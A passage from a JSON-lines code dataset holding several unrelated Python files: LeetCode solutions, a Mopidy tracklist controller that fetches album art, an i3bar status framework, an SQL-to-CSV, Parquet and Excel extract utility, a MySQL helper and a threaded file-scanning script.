max(resL*(resL>0),resR*(resR>0)) + root.val\n else:\n res = resL*(resL>0) + root.val\n elif root.right:\n resR = maxPathFromRoot(root.right)\n res = resR*(resR>0) + root.val\n else:\n res = root.val\n return res\n if root.left:\n resL = self.maxPathSum(root.left)\n resLFromRoot = maxPathFromRoot(root.left)\n if root.right:\n resR = self.maxPathSum(root.right)\n resRFromRoot = maxPathFromRoot(root.right)\n resM = resLFromRoot*(resLFromRoot>0) + resRFromRoot*(resRFromRoot>0) + root.val\n res = max(resL,resR,resM)\n else:\n resM = resLFromRoot*(resLFromRoot>0) + root.val\n res = max(resL,resM)\n elif root.right:\n resR = self.maxPathSum(root.right)\n resRFromRoot = maxPathFromRoot(root.right)\n resM = resRFromRoot*(resRFromRoot>0) + root.val\n res = max(resR,resM)\n else:\n res = root.val\n return res\n\n#recursion\n#runtime O(n^2)\n#key is maxPathToRoot Could be zero\nclass Solution2:\n def maxPathSum(self, root: TreeNode) -> int:\n if not root:\n res = float(\"-inf\")\n return res\n\n def maxPathToRoot(root: TreeNode) ->int:\n if not root:\n return 0\n LRes = maxPathToRoot(root.left)\n RRes = maxPathToRoot(root.right)\n res = max(max(LRes,RRes) + root.val,0)\n return res\n\n LRes = self.maxPathSum(root.left)\n RRes = self.maxPathSum(root.right)\n MRes = maxPathToRoot(root.left) + maxPathToRoot(root.right) + root.val #so it is O(n^2), because here is O(n)\n res = max(LRes,RRes,MRes)\n return res\n\n\n#recursion\n#runtime O(n)\n#key is maxPathToRoot Could be zero\nclass Solution3:\n def maxPathSum(self, root: TreeNode) -> int:\n self.maxres = float(\"-inf\")\n def maxPathToRoot(root: TreeNode) ->int:\n if not root:\n return 0\n LRes = maxPathToRoot(root.left)\n RRes = maxPathToRoot(root.right)\n res = max(max(LRes,RRes) + root.val,0)\n self.maxres = max(self.maxres, LRes + RRes + root.val)\n return res\n maxPathToRoot(root)\n return self.maxres \n\nif __name__=='__main__':\n root = TreeNode(val=-10, left=TreeNode(val=9), right=TreeNode(val=20, left=TreeNode(val=15), right=TreeNode(val=7)))\n root = TreeNode(val= 1, left= TreeNode(val= 2, left= None, right= None), right= TreeNode(val= 3, left= None, right= None))\n root = TreeNode(val=2)\n res = Solution2()\n res.maxPathSum(root)\n\n\n\n","sub_path":"00124binaryTreeMaximumPathSum/00124binaryTreeMaximumPathSum.py","file_name":"00124binaryTreeMaximumPathSum.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"486161325","text":"from __future__ import unicode_literals\n\nimport logging\nimport random\nfrom mopidy.audio import PlaybackState\nfrom mopidy.models import TlTrack\nfrom bbmodels import bbTrack\nimport itunes\nif not itunes.is_caching_enabled():\n itunes.enable_caching()\nimport urllib\nfrom mopidy.core import listener\nimport os\nimport operator\n\nlogger = logging.getLogger('mopidy.bb')\nfrom mopidy import settings\ncover_dir=\"\"\n\nclass bbTracklistController(object):\n pykka_traversable = True\n\n def __init__(self, core,config):\n self._core = core\n self._next_tlid = 1\n self._bb_tracks = []\n self._version = 0\n self._tl_length=0\n self.playingSong=None\n if config['http']['static_dir']:\n cover_dir = config['http']['static_dir']+ \"/tmp/\"\n else:\n cover_dir = os.path.join(os.path.dirname(__file__), 'data')\n\n\n\n\n#Get the songs with their votes, comments and so on...\n def get_bb_tracks(self):\n return self._bb_tracks[:]\n\n tl_tracks = property(get_bb_tracks)\n \"\"\"\n List of :class:`mopidy.boombox.models.bbTrack`.\n\n Read-only.\n \"\"\"\n\n#get only the song\n def get_tracks(self):\n return [bb_track.track for bb_track in self._bb_tracks]\n\n tracks = property(get_tracks)\n \"\"\"\n List of :class:`mopidy.models.Track` in the tracklist.\n\n Read-only.\n \"\"\"\n\n def get_length(self):\n return len(self._bb_tracks)\n\n length = property(get_length)\n \"\"\"Length of the tracklist.\"\"\"\n\n\n def add(self, track, at_position=None, m_msg=\"\",m_name=\"anonym\"):\n \"\"\"\n Add the track or list of tracks to the tracklist.\n\n If ``at_position`` is given, the tracks placed at the given position in\n the tracklist. If ``at_position`` is not given, the tracks are appended\n to the end of the tracklist.\n\n Triggers the :meth:`mopidy.core.CoreListener.tracklist_changed` event.\n\n :param tracks: tracks to add\n :type tracks: list of :class:`mopidy.models.Track`\n :param at_position: position in tracklist to add track\n :type at_position: int or :class:`None`\n :rtype: list of :class:`mopidy.models.TlTrack`\n \"\"\"\n\n iter_track = bbTrack(track,self._next_tlid, \" a msg\", m_name) #bbTrack(self, mtrack , mid, mmsg=\"\", mname=\"\" ):\n\n if at_position is not None:\n self._bb_tracks.insert(at_position, iter_track)\n at_position += 1\n else:\n self._bb_tracks.append(iter_track)\n #self._core.tracklist.add(track)\n \n if iter_track:\n #self._increase_version()\n pass\n self._next_tlid += 1\n \n self.updateOrder()\n \n #logger.info(iter_track.track[0].artists)\n for art in iter_track.track[0].artists:\n break\n try:\n if art != None:\n iter_track.cover_url = self.getCoverUrl(iter_track.track[0].album.name +\" \" + art.name ) \n else:\n iter_track.cover_url=\"default.jpg\"\n except NameError:\n iter_track.cover_url=\"default.jpg\" \n \n return iter_track\n\n def vote(self,bbTrack,nvotes):\n \"\"\"\n Ad or remove a vote within\n\n Perhaps: Triggers the :meth:`mopidy.core.CoreListener.tracklist_changed` event.\n \"\"\"\n bbTrack.votes+=nvotes\n self.updateOrder()\n return bbTrack.votes\n\n def getTrackById(self,song_id):\n for song in self._bb_tracks:\n #logger.info(\" track; \"+ str(song.serialize()) )\n if song.bbid == song_id:\n return song\n return None\n\n def getTrackByMainlistId(self,song_id):\n for song in self._bb_tracks:\n if song.tlid==song_id:\n return song\n return None\n\n\n def clear(self):\n \"\"\"\n Clear the tracklist.\n\n Triggers the :meth:`mopidy.core.CoreListener.tracklist_changed` event.\n \"\"\"\n self._bb_tracks = []\n #self._increase_version()\n\n def index(self, bb_track):\n \"\"\"\n Get index of the given :class:`mopidy.models.TlTrack` in the tracklist.\n\n Raises :exc:`ValueError` if not found.\n\n :param tl_track: track to find the index of\n :type tl_track: :class:`mopidy.models.TlTrack`\n :rtype: int\n \"\"\"\n return self._bb_tracks.index(bb_track)\n\n def move(self, start, end, to_position):\n \"\"\"\n Move the tracks in the slice ``[start:end]`` to ``to_position``.\n\n Triggers the :meth:`mopidy.core.CoreListener.tracklist_changed` event.\n\n :param start: position of first track to move\n :type start: int\n :param end: position after last track to move\n :type end: int\n :param to_position: new position for the tracks\n :type to_position: int\n \"\"\"\n if start == end:\n end += 1\n\n tl_tracks = self._bb_tracks\n\n assert start < end, 'start must be smaller than end'\n assert start >= 0, 'start must be at least zero'\n assert end <= len(tl_tracks), \\\n 'end can not be larger than tracklist length'\n assert to_position >= 0, 'to_position must be at least zero'\n assert to_position <= len(tl_tracks), \\\n 'to_position can not be larger than tracklist length'\n\n new_tl_tracks = tl_tracks[:start] + tl_tracks[end:]\n for tl_track in tl_tracks[start:end]:\n new_tl_tracks.insert(to_position, tl_track)\n to_position += 1\n self._bb_tracks = new_tl_tracks\n #self._increase_version()\n\n def remove(self, m_bbid):\n tl_tracks = self.filter( { 'bbid':m_bbid } )\n for tl_track in tl_tracks:\n position = self._bb_tracks.index(tl_track)\n del self._bb_tracks[position]\n #self._increase_version()\n return tl_tracks\n\n def filter(self, criteria=None, **kwargs):\n \"\"\"\n Filter the tracklist by the given criterias.\n\n Examples::\n\n # Returns track with TLID 7 (tracklist ID)\n filter({'tlid': 7})\n filter(tlid=7)\n\n # Returns track with ID 1\n filter({'id': 1})\n filter(id=1)\n\n # Returns track with URI 'xyz'\n filter({'uri': 'xyz'})\n filter(uri='xyz')\n\n # Returns track with ID 1 and URI 'xyz'\n filter({'id': 1, 'uri': 'xyz'})\n filter(id=1, uri='xyz')\n\n :param criteria: on or more criteria to match by\n :type criteria: dict\n :rtype: list of :class:`mopidy.models.TlTrack`\n \"\"\"\n criteria = criteria or kwargs\n matches = self._bb_tracks\n for (key, value) in criteria.iteritems():\n if key == 'tlid':\n matches = filter(lambda ct: ct.tlid == value, matches)\n elif key == 'bbid':\n matches = filter(lambda ct: ct.bbid == value, matches)\n else:\n matches = filter(\n lambda ct: getattr(ct.track, key) == value, matches)\n return matches\n\n\n def getCoverUrl(self, album_title):\n try:\n album = itunes.search_album(album_title)[0]\n aa=album.get_artwork()\n bb=aa['100'].replace('100x100','225x225')\n fname=bb[bb.rfind(\"/\")+1:len(bb)]\n except Exception:\n #logger.info(\"NO COVER AVAILABLE\")\n return \"default.jpg\" \n if ( os.path.isfile(cover_dir+fname) ==False) :\n urllib.urlretrieve (bb, cover_dir+fname)\n return fname\n \n \n pass\n \n\n\n\n def getNextOne(self):\n if(self.get_length>0) :\n return self._bb_tracks[0]\n else:\n return None\n\n def updateOrder(self):\n\n #imprescindible\n #oldList=self._bb_tracks;\n #self.sortedlist = sorted(self.songDict, key=lambda x: self.songDict[x].votes , reverse=True)\n #first order by time\n #sortedlist_tmp = sorted(self.songDict.values(), key=attrgetter('timeStamp'), reverse=False);\n # and then by votes\n self._bb_tracks.sort( key=operator.attrgetter(\"votes\"), reverse=True);\n\n def playNext(self):\n #logger.info(\"playback ended ----\")\n if( self._core.tracklist.get_length().get() == 0 ): #Si no hay ninguna cancion en el TL \"oficial\" Esto va a pasar siempre por disenio\n nextbbSong=self.getNextOne()\n\n if(nextbbSong!=None):\n\n\n tl_tracks=self._core.tracklist.add(nextbbSong.track).get() #Aniadimos una\n nextbbSong.tlid=tl_tracks[0].tlid #Y copiamos el ID de tracklist\n self.playingSong=nextbbSong\n self.remove(nextbbSong.bbid)\n if(self._core.playback.get_state().get()!=PlaybackState.PLAYING):\n self._core.playback.play().get()\n ctrac =self._core.playback.get_current_track().get().length\n #self._core.playback.seek(ctrac-15000).get()\n \n def isSongInTracklist(self, song_uri):\n for song in self._bb_tracks: \n if song.track[0].uri == song_uri:\n return song\n return None\n \n def getTrackListLength(self):\n tl_length=0;\n for song in self._bb_tracks:\n try:\n tl_length += song.track[0].length\n except TypeError:\n tl_length += 120000 \n \n if tl_length==0:\n tl_length=90000\n \n self._tl_length=tl_length\n return self._tl_length\n \n def getFastTlLength(self):\n return self._tl_length\n \n \n \n\n\n\n\n\n \n\n","sub_path":"mopidy/frontends/http/boombox/bbtracklist.py","file_name":"bbtracklist.py","file_ext":"py","file_size_in_byte":9700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"424628718","text":"#! /usr/bin/python\n\nimport asyncio as aio\nimport bisect\nimport json\nimport time\nimport traceback as trc\nfrom abc import abstractmethod\nfrom collections import Counter\nfrom datetime import timedelta\nfrom math import floor, log10\nfrom shutil import which\nfrom statistics import median\nfrom sys import stderr, stdin, stdout\nfrom typing import Any\nfrom typing import Counter as Ctr_t\nfrom typing import Dict, Set, Tuple, Union\n\n# base 16 tomorrow colors\n# https://chriskempson.github.io/base16/#tomorrow\n\nNEAR_BLACK = \"#1D1F21\"\nDARKER_GREY = \"#282A2E\"\nDARK_GREY = \"#373B41\"\nGREY = \"#969896\"\nLIGHT_GREY = \"#B4B7B4\"\nLIGHTER_GREY = \"#C5C8C6\"\nNEAR_WHITE = \"#E0E0E0\"\nWHITE = \"#FFFFFF\"\nRED = \"#CC6666\"\nORANGE = \"#DE935F\"\nYELLOW = \"#F0C674\"\nGREEN = \"#B5BD68\"\nCYAN = \"#8ABEB7\"\nBLUE = \"#81A2BE\"\nVIOLET = \"#B294BB\"\nBROWN = \"#A3685A\"\n\nCHUNK_DEFAULTS = {\n \"markup\": \"pango\",\n \"border\": DARK_GREY,\n \"separator\": \"false\",\n \"separator_block_width\": 0,\n}\n\nLOOP = aio.get_event_loop()\n\n\ndef process_chunk(unit: \"PY9Unit\", chunk, padding, **kwargs):\n # TODO: short_text support\n \"\"\"\n Generates a JSON string snippet corresponding to the output one i3bar\n unit.\n\n Args:\n chunk:\n A string, the `full_text` of the unit's output, or `None`.\n padding:\n number of spaces to add at the beginning and end of each unit's\n text\n kwargs:\n any valid i3bar input API keyword. Takes precedence over\n default values.\n\n Returns:\n a string containing JSON output expected by the i3bar API for a single\n bar element.\n\n Will override defaults with, in decreasing order of precedence,\n `unit.transient_overrides` (which will be cleared after)\n `unit.permanent_overrides` (which, naturally, will not)\n kwargs (\"global\" overrides set in the control loop)\n \"\"\"\n\n # chunks can return None to signify no output\n if chunk is None:\n return \"\"\n\n chunk = {\"full_text\": chunk}\n\n # change some defaults:\n chunk.update(CHUNK_DEFAULTS)\n\n # set the name\n chunk.update({\"name\": unit.name})\n\n # apply any global (kwarg) overrides\n chunk.update(kwargs)\n # apply any unit-set overrides\n chunk.update(unit.permanent_overrides)\n # transient overrides take precedence\n chunk.update(unit.transient_overrides)\n unit.transient_overrides.clear()\n\n chunk[\"full_text\"] = \" \" * padding + chunk[\"full_text\"] + \" \" * padding\n\n return json.dumps(chunk)\n\n\nclass PY9Status:\n \"\"\"\n Class managing the control loop.\n\n contains distinct units which each generate one or more output chunks,\n and are polled for output independently according to their `unit.ival`\n value\n \"\"\"\n\n def __init__(self, units, min_sleep=0.1, padding=1, chunk_kwargs=None):\n \"\"\"\n units:\n list of PY9Unit units to poll. their ordering in the list will\n order their output.\n padding:\n number of spaces to add at the beginning and end of each unit's\n output text\n min_sleep:\n minimum number of seconds to sleep between unit poll sweeps.\n format_kwargs:\n kwargs to pass to `process_chunk`, which formats unit output\n into the format expected by i3. Globally verride `process_chunk`\n defaults with this. Units also have means of doing this on an\n individual basis. see PY9Unit.\n \"\"\"\n\n self.fail = \"\"\n names: Set[str] = set()\n\n for u in units:\n if u.name not in names:\n names.add(u.name)\n continue\n self.fail = json.dumps(\n {\n \"full_text\": colorify(\n \"GLOBAL FAILURE: duplicate unit name %s\" % u.name, \"#FF0000\"\n ),\n \"markup\": \"pango\",\n }\n )\n break\n\n self.units = units\n self.units_by_name = {u.name: u for u in units}\n\n if chunk_kwargs is None:\n self.chunk_kwargs: Dict[str, Any] = {}\n else:\n assert isinstance(chunk_kwargs, dict)\n self.chunk_kwargs = chunk_kwargs\n self.padding = padding\n\n self.min_sleep = min_sleep\n\n self.unit_outputs = {\n u.name: process_chunk(\n u,\n colorify('unit \"%s\" loading' % u.name, VIOLET),\n self.padding,\n **self.chunk_kwargs,\n )\n for u in self.units\n }\n\n def write_status_line(self):\n \"\"\"\n Aggregates all units' output into a single string status line and\n writes it.\n \"\"\"\n o = []\n for u in self.units:\n chunk_json = self.unit_outputs[u.name]\n if chunk_json:\n o.append(chunk_json)\n\n stdout.write(\"[\" + \",\".join(o) + \"],\\n\")\n stdout.flush()\n\n async def read_clicks(self):\n rt = aio.StreamReader()\n rp = aio.StreamReaderProtocol(rt)\n\n await LOOP.connect_read_pipe(lambda: rp, stdin)\n\n # we can get by without a json parser for this stream, carefully...\n # \"burn\" the opening [\\n or ,\\n\n await rt.read(2)\n\n while True:\n try:\n raw = await rt.readuntil(b\"}\")\n click = json.loads(raw)\n self.units_by_name[click.pop(\"name\")].handle_click(click)\n # burn the comma\n await rt.readuntil(b\",\")\n except Exception:\n continue\n\n async def line_writer(self):\n while True:\n self.write_status_line()\n await aio.sleep(self.min_sleep)\n\n def run(self) -> None:\n \"\"\"\n The main control loop.\n \"\"\"\n\n # header\n stdout.write('{\"version\":1,\"click_events\":true}\\n[\\n')\n stdout.flush()\n\n if self.fail:\n stdout.write(\"[\" + self.fail + \"],\\n\")\n stdout.flush()\n\n while True:\n time.sleep(1e9)\n\n aio.ensure_future(self.read_clicks(), loop=LOOP)\n for unit in self.units:\n aio.ensure_future(\n unit.main_loop(self.unit_outputs, self.padding, self.chunk_kwargs),\n loop=LOOP,\n )\n aio.ensure_future(self.line_writer())\n\n LOOP.run_forever()\n\n\nclass PY9Unit:\n \"\"\"\n Class producing a single chunk of the status line. Individual units\n should inherit directly from this class.\n\n Each subclass is documented with an Output API, specifying the\n set of output names of the unit.\n\n The existence of a `unit.api` @property is enforced, and should yield\n a dictionary of `key: (type, description)` elements. Each key should\n correspond to a key in the dictionary output by `read`. This api should\n be seen as an extended-form docstring for those wishing to override\n `format` without knowing the details of `read`.\n\n By convention, `read` should indicate failure states through keys\n named `err_*`. `format` should check for these first, as their presence\n might indicate the absence or invalidity of data keys. These errors\n should be documented in the `api`.\n \"\"\"\n\n name_resolver: Ctr_t[str] = Counter()\n\n def __init__(self, name=None, poll_interval=0.33, requires=None, **kwargs) -> None:\n \"\"\"\n Args:\n name:\n name of the unit as seen by i3. if None, will be set to\n the class name. Multiple unnamed instances of the same class\n lead to problems !!!\n poll_interval:\n frequency with which the control loop will try to poll this\n unit. True frequency will be somewhat less\n (see `PY9Status.run`)\n requires:\n list of binaries which are required for this unit to function.\n If any of these is absent, the unit's `_get_chunk`\n method will be replaced with a graceful failure message.\n\n Attributes:\n self.transient_overrides:\n `process_chunk` will, after each invocation of _get_chunk,\n augment the returned json with these parameters, and clear this\n dict.\n self.permanent_overrides:\n same as above, but `process_chunk` will not clear these.\n subordinate to transient_overrides.\n \"\"\"\n\n name = name or self.__class__.__name__\n\n name_ix = self.name_resolver[name]\n self.name_resolver[name] += 1\n name += \"\" if name_ix == 0 else f\"_{name_ix}\"\n self.name = name\n\n self.poll_interval = poll_interval\n # backwards compatibility\n if \"ival\" in kwargs:\n self.poll_interval = kwargs.pop(\"ival\")\n if kwargs:\n raise ValueError(f\"Got unknown arguments {kwargs.keys()}!\")\n\n self.transient_overrides: Dict[str, str] = {}\n self.permanent_overrides: Dict[str, str] = {}\n\n if requires is not None:\n for req in requires:\n if which(req) is None:\n self._get_chunk = lambda: (\n self.name + \" [\" + colorify(req + \" not found\", RED) + \"]\"\n )\n break\n\n self._fail = False\n\n async def main_loop(self, d_out, padding, chunk_kwargs):\n while True:\n try:\n if self._fail:\n raise ValueError\n d_out[self.name] = process_chunk(\n self, self.format(self.read()), padding, **chunk_kwargs\n )\n except Exception:\n if self._fail:\n fail_str = colorify(self._fail, BROWN)\n else:\n fail_str = colorify(f'unit \"{self.name}\" failed', BROWN)\n trc.print_exc(file=stderr)\n d_out[self.name] = process_chunk(\n self, fail_str, padding, **chunk_kwargs\n )\n\n await aio.sleep(self.poll_interval)\n\n @property\n @abstractmethod\n def api(self) -> Dict[str, Tuple[type, str]]:\n \"\"\"\n Get a dictionary mapping read output keys to their types and\n descriptions.\n \"\"\"\n\n @abstractmethod\n def read(self) -> Dict[str, Any]:\n \"\"\"\n Get the unit's output as a dictionary, in line with its API.\n \"\"\"\n\n @abstractmethod\n def format(self, read_output: Dict[str, Any]) -> str:\n \"\"\"\n Format the unit's `read` output, returning a string.\n\n The string will be placed in the \"full_text\" key of the json sent to\n i3.\n\n The string may optionally use pango formatting.\n \"\"\"\n\n def handle_click(self, click: Dict[str, Any]) -> None:\n \"\"\"\n Handle the i3-generated `click`, passed as a dictionary.\n\n See i3 documentation and example code for click's members\n \"\"\"\n self.transient_overrides.update({\"border\": RED})\n\n\ndef mk_tcolor_str(temp):\n if temp < 100:\n tcolor_str = colorify(\n \"{:3.0f}\".format(temp), get_color(temp, breakpoints=[30, 50, 70, 90])\n )\n else: # we're on fire\n tcolor_str = pangofy(\n \"{:3.0f}\".format(temp), color=\"#FFFFFF\", background=\"#FF0000\"\n )\n\n return tcolor_str\n\n\ndef get_color(\n v, breakpoints=None, colors=(BLUE, GREEN, YELLOW, ORANGE, RED), rev=False\n):\n \"\"\"\n Chooses appropriate conditional-color for colorify function.\n\n Maps an integer and an increasing list of midpoints to a colour in the\n `colors` array based on the integer's index in the list of midpoints.\n \"\"\"\n if breakpoints is None:\n breakpoints = [20, 40, 60, 80]\n if rev:\n colors = list(reversed(colors))\n return colors[bisect.bisect(breakpoints, v)]\n\n\ndef pangofy(s, **kwargs):\n \"\"\"\n applies kwargs to s, pango style, returning a span string\n \"\"\"\n a = (\n \"\"\n )\n b = \"\"\n return a + s + b\n\n\ndef colorify(s, color):\n return pangofy(s, color=color)\n\n\ndef colorize_float(val, length, prec, breakpoints):\n return colorify(f\"{val:{length}.{prec}f}\", get_color(val, breakpoints=breakpoints))\n\n\ndef format_duration(val: Union[timedelta, float]) -> str:\n \"\"\"\n Formats a duration in seconds in a human-readable way.\n\n Has a fixed width of 9.\n \"\"\"\n\n if isinstance(val, timedelta):\n val = val.seconds + 1e-6 * val.microseconds\n\n if val < 60:\n if val < 1e-9:\n unit = \"ps\"\n disp_val = val * 1e12\n elif val < 1e-6:\n unit = \"ns\"\n disp_val = val * 1e9\n elif val < 1e-3:\n unit = \"us\"\n disp_val = val * 1e6\n elif val < 1.0:\n unit = \"ms\"\n disp_val = val * 1e3\n else:\n unit = \"s \"\n disp_val = val\n\n prec = max(0, 2 - floor(log10(disp_val)))\n\n return f\" {disp_val: >4.{prec}f} {unit} \"\n\n # val (- [minute, four weeks)\n elif 60 <= val < 3155760000:\n if val < 3600:\n fst, snd_s = divmod(val, 60)\n snd = int(snd_s)\n ufst, usnd = \"m\", \"s\"\n elif val < 86400:\n fst, snd_s = divmod(val, 3600)\n snd = int(snd_s / 60)\n ufst, usnd = \"h\", \"m\"\n elif val < 604800:\n fst, snd_s = divmod(val, 86400)\n snd = int(snd_s / 3600)\n ufst, usnd = \"d\", \"h\"\n elif val < 31557600:\n fst, snd_s = divmod(val, 604800)\n snd = int(snd_s / 86400)\n ufst, usnd = \"w\", \"d\"\n else:\n fst, snd_s = divmod(val, 31557600)\n snd = int(snd_s / 604800)\n ufst, usnd = \"y\", \"w\"\n\n return f\"{int(fst): >2d} {ufst} {snd: >2d} {usnd}\"\n\n # XXX expand unto aeons\n else:\n return \" > 10 y \"\n\n\ndef maybe_int(x):\n try:\n return int(x)\n except ValueError:\n return x\n\n\ndef med_mad(xs):\n \"\"\"\n Returns the median and median absolute deviation of the passed iterable.\n \"\"\"\n\n med = median(xs)\n mad = median(abs(x - med) for x in xs)\n\n return med, mad\n","sub_path":"py9status/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":14227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"138001924","text":"import csv\nimport pandas as pd\nimport openpyxl\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.pool import NullPool\nfrom .sqldb import SQLDB\nimport logging\nfrom os.path import basename\n\n# Rename to Extract and remove existing Extract class\nclass Extract:\n def __init__(self):\n self.df = None\n self.path = None\n self.logger = logging.getLogger(__name__)\n\n def to_csv(self, csv_path, sep=\"\\t\", chunksize=None, debug=False, cursor=None):\n self.logger.info(f\"Downloading data into '{basename(csv_path)}'...\")\n\n if self.tool_name == \"QFrame\":\n self.sql = self.get_sql()\n if \"denodo\" in self.engine.lower():\n self.sql += \" CONTEXT('swap' = 'ON', 'swapsize' = '400', 'i18n' = 'us_est', 'queryTimeout' = '9000000000', 'simplify' = 'off')\"\n row_count = to_csv(\n columns=self.get_fields(aliased=True),\n csv_path=csv_path,\n sql=self.sql,\n engine=self.engine,\n sep=sep,\n chunksize=chunksize,\n cursor=cursor,\n interface=self.interface,\n )\n self.logger.info(f\"Successfully wrote to '{basename(csv_path)}'\")\n if debug:\n return row_count\n return self\n elif self.tool_name == \"GitHub\":\n self.df.to_csv(csv_path)\n\n def to_parquet(self, parquet_path, chunksize=None, debug=False, cursor=None):\n \"\"\"Saves data to Parquet file.\n TO CHECK: I don't think we need chunksize anymore since we do chunks with\n sql\n\n Note: You need to use BIGINT and not INTEGER as custom_type in QFrame. The\n problem is that parquet files use int64 and INTEGER is only int4\n\n Parameters\n ----------\n parquet_path : str\n Path to template Parquet file\n chunksize : str\n Not implemented\n debug : str, optional\n Whether to display the number of rows returned by the query\n Returns\n -------\n Class\n \"\"\"\n if self.tool_name == \"QFrame\":\n self.df = self.to_df()\n self.df.astype(dtype=self.dtypes).to_parquet(parquet_path)\n elif self.tool_name == \"GitHub\":\n self.df.astype(dtype=self.df.dtypes).to_parquet(parquet_path)\n if debug:\n return self.df.shape[0] or 0\n\n def to_excel(\n self, input_excel_path, output_excel_path, sheet_name=\"\", startrow=0, startcol=0, index=False, header=False,\n ):\n \"\"\"Saves data to Excel file.\n\n Parameters\n ----------\n input_excel_path : str\n Path to template Excel file\n output_excel_path : str\n Path to Excel file in which we want to save data\n sheet_name : str, optional\n Sheet name, by default ''\n startrow : int, optional\n Upper left cell row to dump data, by default 0\n startcol : int, optional\n Upper left cell column to dump data, by default 0\n index : bool, optional\n Write row index, by default False\n header : bool, optional\n Write header, by default False\n\n Returns\n -------\n Class\n \"\"\"\n copy_df_to_excel(\n df=self.df,\n input_excel_path=input_excel_path,\n output_excel_path=output_excel_path,\n sheet_name=sheet_name,\n startrow=startrow,\n startcol=startcol,\n index=index,\n header=header,\n )\n\n\ndef copy_df_to_excel(\n df, input_excel_path, output_excel_path, sheet_name=\"\", startrow=0, startcol=0, index=False, header=False,\n):\n writer = pd.ExcelWriter(input_excel_path, engine=\"openpyxl\")\n book = openpyxl.load_workbook(input_excel_path)\n writer.book = book\n\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\n\n df.to_excel(\n writer, sheet_name=sheet_name, startrow=startrow, startcol=startcol, index=index, header=header,\n )\n\n writer.path = output_excel_path\n writer.save()\n writer.close()\n\n\ndef to_csv(columns, csv_path, sql, engine=None, sep=\"\\t\", chunksize=None, debug=False, cursor=None, interface=None):\n \"\"\"\n Writes table to csv file.\n Parameters\n ----------\n csv_path : string\n Path to csv file.\n sql : string\n SQL query.\n engine : str, optional\n Engine string. Required if cursor is not provided.\n sep : string, default '\\t'\n Separtor/delimiter in csv file.\n chunksize : int, default None\n If specified, return an iterator where chunksize is the number of rows to include in each chunk.\n cursor : Cursor, optional\n The cursor to be used to execute the SQL, by default None\n \"\"\"\n interface = interface or \"sqlalchemy\"\n if cursor:\n cursor.execute(sql)\n close_cursor = False\n\n else:\n db = \"denodo\" if \"denodo\" in engine else \"redshift\"\n\n if interface == \"sqlalchemy\":\n engine = create_engine(engine)\n try:\n con = engine.connect().connection\n cursor = con.cursor()\n cursor.execute(sql)\n except:\n try:\n con = engine.connect().connection\n cursor = con.cursor()\n cursor.execute(sql)\n except:\n raise\n else:\n con = SQLDB(db=db, engine_str=engine, interface=interface).get_connection()\n cursor = con.cursor()\n cursor.execute(sql)\n\n close_cursor = True\n\n with open(csv_path, \"w\", newline=\"\", encoding=\"utf-8\") as csvfile:\n writer = csv.writer(csvfile, delimiter=sep)\n writer.writerow(columns)\n cursor_row_count = 0\n if isinstance(chunksize, int):\n if chunksize == 1:\n while True:\n row = cursor.fetchone()\n cursor_row_count += 1\n if not row:\n break\n writer.writerow(row)\n else:\n while True:\n rows = cursor.fetchmany(chunksize)\n cursor_row_count += len(rows)\n if not rows:\n break\n writer.writerows(rows)\n else:\n writer.writerows(cursor.fetchall())\n\n if close_cursor:\n cursor.close()\n con.close()\n\n return cursor_row_count\n","sub_path":"grizly/tools/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"581922546","text":"import mysql.connector\nimport connection_info\n\n\ndef get_list_has():\n cnx = mysql.connector.connect(user=connection_info.MyUser, password=connection_info.MyPassword,\n host=connection_info.MyHost,\n database=connection_info.MyDatabase)\n\n cursor = cnx.cursor()\n query = \"SELECT * FROM Has;\"\n hases = []\n try:\n cursor.execute(query)\n for (locID, prodID, price, stock) in cursor:\n hases.append({\n \"Location ID\": locID,\n \"Product ID\": prodID,\n \"Price\": price,\n \"Number in Stock\": stock,\n })\n\n except Exception as e:\n print(\"Oi Got Err:\")\n print(e)\n cursor.close()\n cnx.close()\n return []\n\n cursor.close()\n cnx.close()\n return hases\n","sub_path":"api/db_actions/has.py","file_name":"has.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"314820399","text":"import os.path\nimport re\nimport _thread\nimport threading\nimport logging\n\n\n\n# 遍历指定目录,显示目录下的所有文件名\ndef eachFile(line,filepath):\n count = 0\n pathDir = os.listdir(filepath)\n for allDir in pathDir:\n child = os.path.join('%s/%s' % (filepath, allDir))\n if os.path.isfile(child):\n if count > 0:\n print(\"before:\")\n print(count)\n count += readFile(child,line)\n if count > 0:\n print(count)\n # print child.decode('gbk') # .decode('gbk')是解决中文显示乱码问题\n continue\n else:\n eachFile(line,filepath)\n\n# 遍历出结果 返回文件的名字\ndef readFile(filenames,line):\n fopen = open(filenames, 'r') # r 代表read\n fileread = fopen.read()\n t = re.search(r'%s' %line, fileread)\n fopen.close()\n if t:\n #arr.append(filenames)\n return 1\n return 0\n\n\n #reg = r'.*?(welfare\\.redpacket\\.rabbitmq\\.queueName).*?'\n #key = re.compile(reg,re.S)\n #keylist = key.findall(fileread)\n #if keylist is not None:\n #return len(keylist)\n\ndef countNum(line,filepath):\n try:\n count = eachFile(line,filepath)\n print(line)\n print(count)\n except Exception as e:\n logging.exception(e)\n\nif __name__ == \"__main__\":\n filepath = '/Users/lichuang.lc/Documents/git/ops-activity/mainVenue/server/src/main/java'\n f = open(\"./source.txt\")\n line = f.readline()\n\n while line:\n _thread.start_new_thread(countNum, (line,filepath))\n print(\"Thread-\" + str(line) + \"start\")\n line = f.readline()\n f.close()\n\n while 1:\n pass","sub_path":"文本处理/代码扫描/scanMany.py","file_name":"scanMany.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"313068454","text":"from collections import defaultdict, deque\n\n\nclass Solution:\n # BFS\n def alienOrder(self, words: List[str]) -> str:\n counter, graph = {}, {}\n for word in words:\n for c in word:\n counter[c] = 0\n graph[c] = set()\n for i in 